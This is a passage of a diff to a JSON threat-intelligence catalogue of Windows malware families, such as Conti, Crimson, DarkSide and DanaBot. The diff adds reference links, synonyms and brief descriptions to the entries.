"https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware" + "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", + "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/", + "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", + "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", + "https://twitter.com/AltShiftPrtScn/status/1423188974298861571" ], "synonyms": [], "type": [] }, "uuid": "c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c", - "value": "Conti Ransomware" + "value": "Conti" }, { "description": "FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.", @@ -12090,11 +13913,26 @@ "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", "value": "CookieBag" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer", + "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft" + ], + "synonyms": [], + "type": [] + }, + "uuid": "87afcc5d-27f6-4427-b43c-4621a66e5041", + "value": "CopperStealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf", + "https://www.crowdstrike.com/blog/ecrime-ecosystem/", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/" ], "synonyms": [], @@ -12159,6 +13997,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://vblocalhost.com/uploads/VB2020-20.pdf", @@ -12173,7 +14012,7 @@ "value": "Cotx RAT" }, { - "description": "", + "description": "Covicli is a modified SSLeay32 dynamic library designated as a backdoor.\r\nThe dynamic library allows the attacker to communicate with the C2 over openSSL.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli", @@ -12232,6 +14071,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat", "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg", + "https://suspected.tistory.com/269", + "https://www.secrss.com/articles/18635", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html" ], @@ -12284,20 +14125,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", - "https://s.tencent.com/research/report/669.html", + "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east", + "https://twitter.com/teamcymru/status/1351228309632385027", + "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/", + "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", "https://blog.yoroi.company/research/transparent-tribe-four-years-later", "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF", - "https://securelist.com/transparent-tribe-part-2/98233/", + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", + "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ", + "https://s.tencent.com/research/report/669.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg", "https://www.secrss.com/articles/24995", - "https://twitter.com/teamcymru/status/1351228309632385027", "https://securelist.com/transparent-tribe-part-1/98127/", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/" + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "SEEDOOR", @@ -12322,36 +14172,44 @@ "value": "CrimsonIAS" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", "https://twitter.com/swisscom_csirt/status/1354052879158571008" ], "synonyms": [], "type": [] }, "uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744", - "value": "Cring Ransomware" + "value": "Cring" }, { "description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.youtube.com/watch?v=8x-pGlWpIYI", "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/", + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://content.fireeye.com/apt-41/rpt-apt41/", "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", "https://twitter.com/MrDanPerez/status/1159459082534825986" ], "synonyms": [ "Motnug", - "ProxIP" + "ProxIP", + "TOMMYGUN" ], "type": [] }, @@ -12363,6 +14221,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" ], "synonyms": [], @@ -12380,8 +14239,10 @@ "https://hackmag.com/security/ransomware-russian-style/", "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://securelist.com/cis-ransomware/104452/", "https://twitter.com/albertzsigovits/status/1217866089964679174", "https://twitter.com/bartblaze/status/1305197264332369920", + "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html", "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/", @@ -12480,12 +14341,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.secureworks.com/research/cryptolocker-ransomware" + "https://www.secureworks.com/research/cryptolocker-ransomware", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware" ], "synonyms": [], "type": [] @@ -12663,6 +14528,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://samvartaka.github.io/malware/2015/11/20/ctb-locker" ], @@ -12673,17 +14539,22 @@ "value": "CTB Locker" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba", - "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html" + "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html", + "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf", + "https://blog.group-ib.com/hancitor-cuba-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf" ], "synonyms": [], "type": [] }, "uuid": "6d9dfc5f-4ebf-404b-ab5e-e6497867fe65", - "value": "Cuba Ransomware" + "value": "Cuba" }, { "description": "", @@ -12714,7 +14585,22 @@ "value": "Cueisfry" }, { - "description": "", + "description": "Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator", + "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf" + ], + "synonyms": [ + "Ever101" + ], + "type": [] + }, + "uuid": "f1d2093b-e008-4591-8a67-5b9c7684b8c6", + "value": "Curator" + }, + { + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer", @@ -12724,7 +14610,7 @@ "type": [] }, "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528", - "value": "Cursed Murderer Ransomware" + "value": "Cursed Murderer" }, { "description": "", @@ -12747,6 +14633,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail", "http://www.secureworks.com/research/threat-profiles/gold-essex", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", @@ -12770,10 +14658,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://citizenlab.ca/2015/12/packrat-report/" + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Rebhip" @@ -12809,7 +14698,7 @@ "value": "CycBot" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat", @@ -12820,7 +14709,7 @@ "type": [] }, "uuid": "1995ed0a-81d9-43ca-9b38-6f001af84bbc", - "value": "Cyrat Ransomware" + "value": "Cyrat" }, { "description": "", @@ -12845,9 +14734,12 @@ "https://www.sygnia.co/mata-framework", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://malwareandstuff.com/peb-where-magic-is-stored/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" ], - "synonyms": [], + "synonyms": [ + "MATA" + ], "type": [] }, "uuid": "7c2b19be-f06b-4b21-b003-144e92d291d1", @@ -12910,11 +14802,12 @@ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", + "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", @@ -12922,12 +14815,15 @@ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/", + "https://blog.lexfo.fr/danabot-malware.html", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" ], "synonyms": [], @@ -12943,7 +14839,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot", "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f", + "https://www.youtube.com/watch?v=FttiysUZmDw", "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/" ], "synonyms": [], @@ -12960,6 +14858,7 @@ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://content.fireeye.com/apt/rpt-apt38", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", @@ -12981,6 +14880,19 @@ "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", "value": "DarkComet" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkirc", + "https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8258311c-0d64-4c6b-ab94-915e2cc267f0", + "value": "DarkIRC" + }, { "description": "", "meta": { @@ -13042,7 +14954,8 @@ "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/" ], "synonyms": [], "type": [] @@ -13051,28 +14964,115 @@ "value": "DarkShell" }, { - "description": "", + "description": "FireEye describes DARKSIDE as a ransomware written in C and configurable to target files whether on fixed, removable disks, or network shares. The malware can be customized by the affiliates to create a build for specific victims.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack", + "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/", + "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter", + "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://twitter.com/ValthekOn/status/1422385890467491841?s=20", "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", - "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", - "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", + "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/", + "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", + "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", + "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware", + "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://www.varonis.com/blog/darkside-ransomware/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", + "https://www.databreaches.net/a-chat-with-darkside/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a", + "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://unit42.paloaltonetworks.com/darkside-ransomware/", + "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/", + "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside", + "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html", + "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", + "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/", + "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/", + "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", - "https://www.acronis.com/en-us/articles/darkside-ransomware/" + "https://blog.group-ib.com/blackmatter#", + "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf", + "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html", + "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", + "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/", + "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/", + "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-131a", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", + "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html", + "https://www.secureworks.com/research/threat-profiles/gold-waterfall", + "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/", + "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/", + "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://twitter.com/sysopfb/status/1422280887274639375", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/", + "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", + "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/", + "https://www.acronis.com/en-us/articles/darkside-ransomware/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.secjuice.com/blue-team-detection-darkside-ransomware/", + "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", + "https://community.riskiq.com/article/fdf74f23", + "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/", + "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html" + ], + "synonyms": [ + "BlackMatter" ], - "synonyms": [], "type": [] }, "uuid": "625bcba0-faab-468e-b5ab-61116cb1b5cf", - "value": "DarkSide" + "value": "DarkSide (Windows)" }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", @@ -13151,6 +15151,21 @@ "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", "value": "Daserf" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator", + "https://blog.reversinglabs.com/blog/data-exfiltrator" + ], + "synonyms": [ + "FileSender" + ], + "type": [] + }, + "uuid": "96d727c3-bac6-4c7e-8868-b7237df55ecd", + "value": "DataExfiltrator" + }, { "description": "", "meta": { @@ -13179,7 +15194,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands", - "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/" + "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader" ], "synonyms": [ "ModiLoader", @@ -13196,7 +15212,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat", "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", - 